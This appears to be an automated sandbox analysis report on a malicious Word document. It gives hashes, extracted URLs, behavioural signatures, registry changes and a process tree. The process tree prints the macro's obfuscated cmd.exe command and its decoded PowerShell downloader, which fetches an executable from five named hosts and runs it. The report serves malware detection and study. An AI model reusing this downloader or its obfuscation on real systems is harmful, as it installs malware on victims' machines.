Analysis
-
max time kernel
55s -
max time network
36s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22-11-2024 02:22
Behavioral task
behavioral1
Sample
22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc
Resource
win10v2004-20241007-en
General
-
Target
22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc
-
Size
105KB
-
MD5
ed8ef17ea6d7cf17d582cf27c0026b01
-
SHA1
8a876c8c80f607347d11d07e262b8c59396ef115
-
SHA256
22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8
-
SHA512
01c454eebf9246c987db12455a68bd72c6208197b1b1511afa9888f2dc5467f4153e12c8ba41de33a32f8cbf2d38b38a8c2491bd5d05a5ae48fa91d06b4ccd57
-
SSDEEP
1536:fuwocn1kp59gxBK85fBU8NGo67Di7lSbKexUtrxBk7PvwVIvbVJXKDiFayL:g41k/W48+8NGoGD0loKexMjIVJaDiFa
Malware Config
Extracted
http://liarla.com/RqAjQLJlx
http://espasat.com/1YbH45y
http://latuconference.com/wp-content/uploads/vvl9XHG
http://dirtyactionsports.com/vVgr4dva
http://demign.com/PGT53cb
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2752 1852 cmd.exe 29 -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid Process 5 2692 powershell.exe 7 2692 powershell.exe 9 2692 powershell.exe 10 2692 powershell.exe -
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXEdescription ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
WINWORD.EXEcmd.execmd.execmd.execmd.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
Processes:
WINWORD.EXEdescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\0\win32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\TypeLib\{EDF77FCF-9DBF-4CCE-9E55-4A6D45901CFE}\2.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid Process 1852 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2692 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
WINWORD.EXEpid Process 1852 WINWORD.EXE 1852 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXEpid Process 1852 WINWORD.EXE 1852 WINWORD.EXE -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
WINWORD.EXEcmd.execmd.execmd.exedescription pid Process procid_target PID 1852 wrote to memory of 2340 1852 WINWORD.EXE 30 PID 1852 wrote to memory of 2340 1852 WINWORD.EXE 30 PID 1852 wrote to memory of 2340 1852 WINWORD.EXE 30 PID 1852 wrote to memory of 2340 1852 WINWORD.EXE 30 PID 1852 wrote to memory of 2752 1852 WINWORD.EXE 31 PID 1852 wrote to memory of 2752 1852 WINWORD.EXE 31 PID 1852 wrote to memory of 2752 1852 WINWORD.EXE 31 PID 1852 wrote to memory of 2752 1852 WINWORD.EXE 31 PID 2752 wrote to memory of 2864 2752 cmd.exe 33 PID 2752 wrote to memory of 2864 2752 cmd.exe 33 PID 2752 wrote to memory of 2864 2752 cmd.exe 33 PID 2752 wrote to memory of 2864 2752 cmd.exe 33 PID 2864 wrote to memory of 2764 2864 cmd.exe 35 PID 2864 wrote to memory of 2764 2864 cmd.exe 35 PID 2864 wrote to memory of 2764 2864 cmd.exe 35 PID 2864 wrote to memory of 2764 2864 cmd.exe 35 PID 2864 wrote to memory of 2644 2864 cmd.exe 36 PID 2864 wrote to memory of 2644 2864 cmd.exe 36 PID 2864 wrote to memory of 2644 2864 cmd.exe 36 PID 2864 wrote to memory of 2644 2864 cmd.exe 36 PID 2644 wrote to memory of 2692 2644 cmd.exe 37 PID 2644 wrote to memory of 2692 2644 cmd.exe 37 PID 2644 wrote to memory of 2692 2644 cmd.exe 37 PID 2644 wrote to memory of 2692 2644 cmd.exe 37
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\22a9879ed2647f7a2d634c2bce52bd183e8c0fd9073477758afe3080ed2f83a8.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2340
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c %pROGraMdATa:~0,1%%ProGrAmDAtA:~9,2% /v:ON/C"SeT 0Kj=poZ^%PUy6PLIC:~5,1^%r^%7E77IONN6ME:~-(,1^%h^%TEMP:~-3,1^%ll $etailersf=Jobac#grou]d`Jo;$c[a]R=]eZ-ob}ect Net.WebClie]t;$I]credible}=Johttp://liarla.com/R`6}QLJlx@http://espasat.com/1Ybk(5[@http://latuco]fere]ce.com/Zp-co]te]t/uploads/vvl9XkG@http://dirt[actio]sports.com/vVgr(dva@http://demig].com/PGT53cbJo.7plit?Jo@Jo);$Tast[7oftComputerP=JovioletWJo;$CreditCard6ccou]tG = Jo(08Jo;$Woode]p=Jorevolutio]i2eOJo;$6vo]u=$e]v:public+Jo\Jo+$CreditCard6ccou]tG+Jo.exeJo;foreach?$Lice]sedt i] $I]credible}){tr[{$c[a]R.DoZ]loadqpile?$Lice]sedt, $6vo]u);$programmi]gy6P=JomodelsTJo;If ??Get-Item $6vo]u).le]gth -ge 80000) {I]vo#e-Item $6vo]u;$y6Proo#s2=JoProactive7Jo;brea#;__catch{__$y6Per#shireQ=JoorchestratehJo;&& seT R2W=!0Kj:(=4!&& sEt IOl=!R2W:Jo='!&& sET 1f=!IOl:?=(!&set kKg=!1f:qp=F!& SET WK=!kKg:y6P=B!& SeT JtU=!WK:]=n!& SET p6=!JtU:k=H!& set 5ql=!p6:#=k!&& SET aR=!5ql:6=A!&& seT Ay=!aR:}=j!& SEt UNIF=!Ay:_=}!& SeT fmBy=!UNIF:`=q!& sET 8ps=!fmBy:[=y!&& set kMJ4=!8ps:7=S!& SeT ImBE=!kMJ4:Z=w!&& SET le=!ImBE:2=z!&&EChO %le% | cmD.ExE "2⤵
- Process spawned unexpected child process
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\SysWOW64\cmd.exeCmD /v:ON/C"SeT 0Kj=poZ^%PUy6PLIC:~5,1^%r^%7E77IONN6ME:~-(,1^%h^%TEMP:~-3,1^%ll $etailersf=Jobac#grou]d`Jo;$c[a]R=]eZ-ob}ect Net.WebClie]t;$I]credible}=Johttp://liarla.com/R`6}QLJlx@http://espasat.com/1Ybk(5[@http://latuco]fere]ce.com/Zp-co]te]t/uploads/vvl9XkG@http://dirt[actio]sports.com/vVgr(dva@http://demig].com/PGT53cbJo.7plit?Jo@Jo);$Tast[7oftComputerP=JovioletWJo;$CreditCard6ccou]tG = Jo(08Jo;$Woode]p=Jorevolutio]i2eOJo;$6vo]u=$e]v:public+Jo\Jo+$CreditCard6ccou]tG+Jo.exeJo;foreach?$Lice]sedt i] $I]credible}){tr[{$c[a]R.DoZ]loadqpile?$Lice]sedt, $6vo]u);$programmi]gy6P=JomodelsTJo;If ??Get-Item $6vo]u).le]gth -ge 80000) {I]vo#e-Item $6vo]u;$y6Proo#s2=JoProactive7Jo;brea#;__catch{__$y6Per#shireQ=JoorchestratehJo;&& seT R2W=!0Kj:(=4!&& sEt IOl=!R2W:Jo='!&& sET 1f=!IOl:?=(!&set kKg=!1f:qp=F!& SET WK=!kKg:y6P=B!& SeT JtU=!WK:]=n!& SET p6=!JtU:k=H!& set 5ql=!p6:#=k!&& SET aR=!5ql:6=A!&& seT Ay=!aR:}=j!& SEt UNIF=!Ay:_=}!& SeT fmBy=!UNIF:`=q!& sET 8ps=!fmBy:[=y!&& set kMJ4=!8ps:7=S!& SeT ImBE=!kMJ4:Z=w!&& SET le=!ImBE:2=z!&&EChO %le% | cmD.ExE "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EChO %le% "4⤵
- System Location Discovery: System Language Discovery
PID:2764
-
-
C:\Windows\SysWOW64\cmd.execmD.ExE4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $etailersf='backgroundq';$cyanR=new-object Net.WebClient;$Incrediblej='http://liarla.com/RqAjQLJlx@http://espasat.com/1YbH45y@http://latuconference.com/wp-content/uploads/vvl9XHG@http://dirtyactionsports.com/vVgr4dva@http://demign.com/PGT53cb'.Split('@');$TastySoftComputerP='violetW';$CreditCardAccountG = '408';$Woodenp='revolutionizeO';$Avonu=$env:public+'\'+$CreditCardAccountG+'.exe';foreach($Licensedt in $Incrediblej){try{$cyanR.DownloadFile($Licensedt, $Avonu);$programmingB='modelsT';If ((Get-Item $Avonu).length -ge 80000) {Invoke-Item $Avonu;$Brooksz='ProactiveS';break;}}catch{}}$BerkshireQ='orchestrateh';5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
494B
MD541459361dafd679bc31e5e2271983c11
SHA15423216bd3e431a60327e30e6c59e0ffcd47e6b4
SHA25606e889eac8e0ca37060aa62db6e071c13fcc74b478464aa3eb6fc73c96bf8176
SHA5127c66cfe6869a90103aae88fd4095a939846998cc59ffed973693925452c88b3bceeec46de6b4500bef7d2749525a82f42e61cad02091693a5dcec84bbcd9d762